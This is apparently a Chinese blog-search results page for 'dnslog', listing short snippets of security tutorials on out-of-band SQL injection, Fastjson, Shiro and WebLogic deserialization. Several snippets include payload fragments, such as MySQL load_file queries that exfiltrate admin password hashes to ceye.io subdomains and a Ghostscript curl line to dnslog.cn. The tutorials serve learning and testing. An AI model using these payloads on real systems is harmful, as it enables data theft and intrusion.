dnslog

(白帽子学习笔记)前渗透——SQL注入

本文参考了一些文章,如有侵权请联系本人删除注入详解目录注入详解SQL注入SQL注入漏洞的产生必须满足两个条件:SQL注入漏洞的危害注入判断:SQL注入类型:按注入点类型按执行效果类型布尔盲注时间盲注报错注入宽字节注入DNSlog
言冬zzz·2021-08-23 11:47

小迪安全视频笔记--信息收集+sql注入

web视频笔记其他web源码系统及数据库加解密信息收集域名信息收集:web漏洞sql注入跨库查询文件读写:json注入access偏移注入二次注入cookie注入DNSlog注入堆叠注入waf绕过白名单的绕过
dydymm·2021-08-06 10:27

WEB漏洞-二次,加解密,DNS,堆叠等注入

漏洞-二次,加解密,DNS,堆叠等注入sqlilabs-less21-cookie&加解密注入sqlilabs-less24-post登录框&二次注入sqlilabs-less9-load_file&dnslog
硫酸超·2021-08-01 20:07

web安全sql注入堆叠&二次&DNSlog&高权限注入

sql堆叠注入堆叠注入简单的说就是一堆sql语句(多条)执行,由于分号;为MYSQL语句的结束符。若在支持多语句执行的情况下,可利用此方法执行其他恶意语句,如RENAME、DROP等。相关漏洞函数mysqli_multi_query()函数执行一个或多个针对数据库的查询,多个查询用分号隔开。这里用buuctf的靶场进行演示那么打开靶场后如下界面?inject=1'orderby2--+正常注入发现
Nu1LL+·2021-05-22 14:54

DNSlog注入原理

DNSlog注入原理及实验遵守我国网络安全法,仅用于渗透测试交流学习。
建平不吃荤·2021-04-20 15:07

mysql dns 注入_数据库DNSLog外带注入-总结

DNSLog外带注入和DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?
预付费·2021-01-19 16:24

17 WEB漏洞-二次,加解密,DNS等注入

#加解密,二次,DNSlog注入注入原理,演示案例,实际应用(中转注入)DNSlog:解决了盲注不能回显数据,效率低的问题http://127.0.0.1:8080/sqlilabs/less-2/?
小言安全·2021-01-01 00:11

封神台MYSQL 注入 - Dns注入

一、原理DNSLOG的使用场景:在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。
炎凰先生·2020-10-05 12:36

fastjson反序列化漏洞各版本漏洞复现以及原理分析

前言:如何判断后端是否采用了fastjson框架:一方面是通过json解析异常抛出,另一方面可以通过DNSLOG判断:poc:{"@type":"java.net.InetSocketAddress"{
Pro+Hacker·2020-09-12 06:04

sql注入——堆叠注入

堆叠注入即多语句注入,多条语句用;隔开以sqllabs38为例1.在dnslog上获取2.在sqllabs38上输入多条语句:http://localhost/sqli-labs-master/Less
没有如果ru果·2020-08-25 17:51

SQL注入之基于DNS的注入

前言前段时间在做盲注分别是基于时间和基于布尔型的说真的这两种盲注真的太繁琐了都需要一个个的通过ascii码来进行一位位的拆解而且尝试次数太多也有可能被网站ban掉直到一个大佬和我说了这个方法学了才发现这个方法非常的方便也非常的快速在sqlmap跑的时候也比正常的快很多官方店的名字就是DNSlog
天下大木头·2020-08-24 19:00

Out of Band SQL盲注

SQL盲注使用http://ceye.io/DNSlog获取dns记录获取自己的Identifierxxxxxx.ceye.io搭建环境Windowsserver2003+phpstudy+sqli-labsPayload
秋点兵·2020-08-23 22:43

渗透测试学习手册

记录查询渗透测试之信息收集信息收集之利用Shodan搜索ico相同的网站信息收集之Github搜索语法Webshell和一句话木马SQL注入之注入点的判断SQL注入过滤的绕过绕过CDN查找网站真实ip403页面分析网站登录处的加密算法使用DNSLog
谢公子·2020-08-21 01:36

利用dnslog进行无回显注入

原理在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入
原来是老王·2020-08-20 14:50

burpsuite collaborato模块简介 dns log、http_https log、smtp_smtps log

BurpsuitePro自从v1.6.15版本开始引入了一种名为BurpCollaborator的模块,该模块的作用简单的说就是集合了DNSlog,http_httpslog和smtp_smtpslog
whatday·2020-08-16 03:32

利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果

作者:Armyzer0Weblogic(CVE-2017-10271)漏洞出来以后又是一波血雨腥风,正好我昨天测试的时候发现了一个存在这个漏洞的weblogic,但是他不回显咋办呢!让他返回执行结果集到dnslong首先大家先了解下“这个符号在Linux的作用!符号:``名称:反引号,上分隔符位置:反引号(`)这个字符一般在键盘的左上角,数字1的左边,不要将其同单引号(’)混淆作用:反引号括起来的
dfdhxb995397·2020-08-15 07:18

Fastjson

一、检测1.2.67以下的fastjson{"@type":“java.net.Inet4Address”,“val”:“dnslog”}{"@type":“java.net.Inet6Address”
haha13l4·2020-08-13 14:39

dnslog带出——sqli-labs第8关

目录进入关卡库名表名进入关卡另外打开一个新的页面,进入dnslog.cn点击GetSubDomain,得到一个随机分配的子域名。
ihszg·2020-08-05 10:31

SQL注入之dns回显注入

DNSlog外带数据注入用到的网站http://dnsbin.zhack.ca/http://dnslog.cn/http://ceye.io/pyload:查库http://192.168.232.128
行云blog·2020-08-04 11:50

iOS NSLog打印使用总结

全局断点)之外,NSLog是我们调试最常用的方法常用的NSlog打印各种字符数据:NSLog(@"打印字符串:%@",name);NSLog(@"打印整形:%i",number);//或者%li;%ld;%dNSLog
老樊Lu码·2020-08-02 17:35

SQL注入之利用DNSlog外带盲注回显

此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。0x01DNSlog利用条件DBMS中需要有可用的,能直接或间
baynk·2020-07-30 01:26

dnslog盲注原理

Dnslog盲注原理布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护我们需要一种方式能够减少请求,直接回显数据——Dnslog
小冉要开心·2020-07-29 23:40

Dnslog在SQL注入 & 四种数据库

https://www.anquanke.com/post/id/98096mysqlhttp://127.0.0.1/mysql.php?id=1unionselect1,2,load_file(CONCAT('\\',(SELECThex(pass)FROMtest.test_userWHEREname='admin'LIMIT1),'.mysql.nk40ci.ceye.io\abc'))m
ProjectDer·2020-07-29 22:07

20206月份sql注入学习总结

Dnslog盲注:攻击者首先提交注入语句selectload_file(concat(’\\’,‘攻击语句’,.XXX.ceye.io\abc)),concat()把执行结果语句和XXX.ceye.io
韩雨落·2020-07-29 15:52

mssql手工盲注

遇到中文的列名利用unicode进行单字节的转换declare@svarchar(50);set@s=N'拉';selectUniCode(@s),nchar(UniCode(@s));绕狗sql方法利用dnslog
weixin_30929295·2020-07-28 17:37

SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用

Sqli-labs的安装1.安装WAMPhttp://www.wampserver.com/WAMP是php+mysql+Apache环境集成工具2.下载Sqli-labshttps://github.com/webattacker/sqli-labs将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www下3.在浏览器上访问http://localhost然后也可以浏览:http
Victor.Zhang·2020-07-28 14:02

2020年DASCTF五月线上赛-WEB-小红花

dnslog外带-失败尝试过以后payload都没有成功。听别人说之前有人成功过是因为非预期后来再进行尝试就没有成功了。
Bcdlbgm·2020-07-28 08:53

SQL注入奇淫技巧——利用dnslog获取看不到的信息

对于sql盲注,常用的方法应该是二分法了,为此之前还写过通过二分法猜解的半自动化python脚本,说实话,python甲苯比起手动真的已经是好多了,可是我内心其实还是挺怵写脚本的,而且这种脚本二分法猜解发送的请求频繁麻烦不说,还容易被waf检测到,以至于ip被封。于是最近学习了一种sql盲注的奇淫技巧。step1.介绍CEYE平台网址:http://ceye.io/点击进去注册一个帐号,这个平台应
zzqsmile·2020-07-09 13:12

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

<=1.2.4默认shiro的commons-collections版本为3.2.1,环境搭建漏洞测试抓包测试查看返回包里setcookie有rememberme的字样继续测试首先最简单的测试方法是用dnslog
偷一个月亮·2020-06-30 08:16

利用DNSlog进行sql盲注

一、原理测试一些网站的时候,一些注入都是无回显的,手工盲注效率太低,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,虽然可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog
起个名字想上天·2020-06-29 14:05

shiro RCE (反序列化漏洞)

shiroRCE攻击这篇讲1.2.4的反序列化漏洞在实战中的记录第一种比较稳妥的验证漏洞方式:1POCpythonshiro_check_key.pyhttps://xxx.xxx.xxx.xxx"my0njp.dnslog.cn"DNSlog
Pro+Hacker·2020-06-25 14:01

mysql数据库中的骚姿势-dnslog注入原理

,这时候dns会吧www.baidu.com这个域名转换为IP地址Dns其实就是负责把域名转换为IP地址如果还不懂的话点击点击这里查看Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog
YoungBoy啊啊啊·2020-06-24 12:03

记录一次常规的渗透测试

setpagedeviceundefsavelegal{nullrestore}stopped{pop}if{legal}stopped{pop}ifrestoremark/OutputFile(%pipe%curlhttp://dnslog.cn
于小葵·2020-06-23 05:19

通过dnslog探测fastjson的几种方法

0x01背景在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢?这就需要构造特定的payload了。昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类,于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的,我也在这次讨论中学习了很多。这篇文章算是对那些
Adminxe·2020-06-21 16:45

Apache Shiro反序列化漏洞研究及解决方法

客户的QQ头像闪动了,原以为是出了什么新需求临时需要调整,没想到客户反馈的是平台出现了严重漏洞,不敢小视,抄起电脑开弄我根据客户给出的安全厂商反馈的问题,总结如下:1,Shiro反序列化漏洞2,提到了dnslog.cn
呼吸先生·2020-06-20 22:21

一步一步学习 Web 安全 2.8 DNSlog 盲注

原理可能有人对DNSlog比较陌生,先简单说一下DNS,想深入了解的可以跳转到DNS原理入门进行学习。DNSDNS就是把域名转成IP地址。
f1a94e9a1ea7·2020-05-30 18:36

DNSlog注入学习

之前一直有看到过DNSlog这个字眼,但一直没有好好去了解一下,最近又接触到了刚好来深入学习下0x01什么是DNSlog我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠
Lushun·2020-05-15 18:00

Shiro反序列化漏洞检测、dnslog

信息收集poc#pipinstallpycryptoimportsysimportbase64importuuidfromrandomimportRandomimportsubprocessfromCrypto.CipherimportAESdefencode_rememberme(command):popen=subprocess.Popen(['java','-jar','ysoserial-
Mysticbinary·2020-05-05 16:00

dnslog

爆数据的时候也比较慢,所以我们需要用到dnslog盲注。
nice_0e3·2020-04-27 14:00

利用DNSLog实现无回显注入

测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSLOG的原理
vege·2020-04-25 22:00

iOS - NSLog打印(精准打印)

NSLog(@"打印字符串:%@",name);NSLog(@"打印整形:%i",number);//或者%li;%ld;%dNSLog(@"打印字符:%c",c);NSLog(@"打印单浮点数:%f"
CoderLGL·2020-04-12 23:00

利用dnslog进行sql盲注

一、原理攻击者向mysql数据库提交注入语句?id=1'andif((selectload_file(concat('\\\\',(攻击代码),'.xxxxxx.ceye.io\\abc'))),1,0)--+if(x,1,0)如果x为真,则输出1,假则输出0load_file()读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限
beiwo·2020-04-12 10:00

XXE验证与利用流程

特征特征1---.ashx看到url是.ashx后缀的特征2---响应体是xml发现有这些特征都可以用下面的流程测试测试在线工具:http://ceye.io/http://www.dnslog.cn/
Mysticbinary·2020-04-09 18:00

解决跨网QNAP的ddns无法正常工作的问题

解决步骤:1.记录路由器dnsmasq查询日志root@LEDE:~#vi/etc/dnsmasq.conf加入:log-querieslog-facility=/tmp/dnslog.txtlog-async
bianbian_org·2020-04-09 03:35

网络安全从入门到精通 (第五章-2) MySQL注入 — Dns 注入

本文内容:DNSLOG的函数解析UNC路径DNSLOG的使用场景DNSLOG注入的具体流程1,DNSLOG的函数解析:Mysql函数:LOAD_FILE()读取文件的函数。
醋成酒的小墨·2020-04-05 12:00

面试精华问题

问:Sql注入无回显的情况下,利用DNSlog,mysql下利用什么构造代码,mssql下又如何?答:(1)没有回显的情况下,一般编写脚本,进行自动化注入。
唐小风7·2020-03-03 17:58

Apache Shiro 反序列化漏洞利用工具使用

工具下载地址:Shiro_Exploit该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。
「已注销」·2020-02-15 20:32

src域名监控实践

前言我们在挖洞过程中,少不了域名的信息收集,有的是走接口,有的是dnslog爆破,已经很多人开始实践了,这里整理一篇域名监控实践,主要功能是每天更新监控到的src新的域名信息到钉钉提醒。
mzFuzz·2020-02-01 04:23

Dnslog盲注

DNS域名解析的全过程下面来详细解释DNS域名解析的过程:网络客户端就是我们平常使用的电脑,打开浏览器,输入一个域名。比如输入www.163.com,这时,你使用的电脑会发出一个DNS请求到本地DNS服务器。本地DNS服务器一般都是你的网络接入服务器商提供,比如中国电信,中国移动。查询xxx.ceye.io的DNS请求到达本地DNS服务器之后,本地DNS服务器会首先查询它的缓存记录,如果缓存中有此
AirSkys·2019-12-26 00:00

某师范大学新闻传媒系统命令执行到内网渗透

漏洞地址:http://xxxx.xxxx.com返回DNSLOG成功反弹shellroot权限MSF上线扫描端口[+]172.18.27.206:-172.18.27.206:22-TCPOPEN[+
时光与她Time·2019-12-14 16:01
上一页 1 2 3 4 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他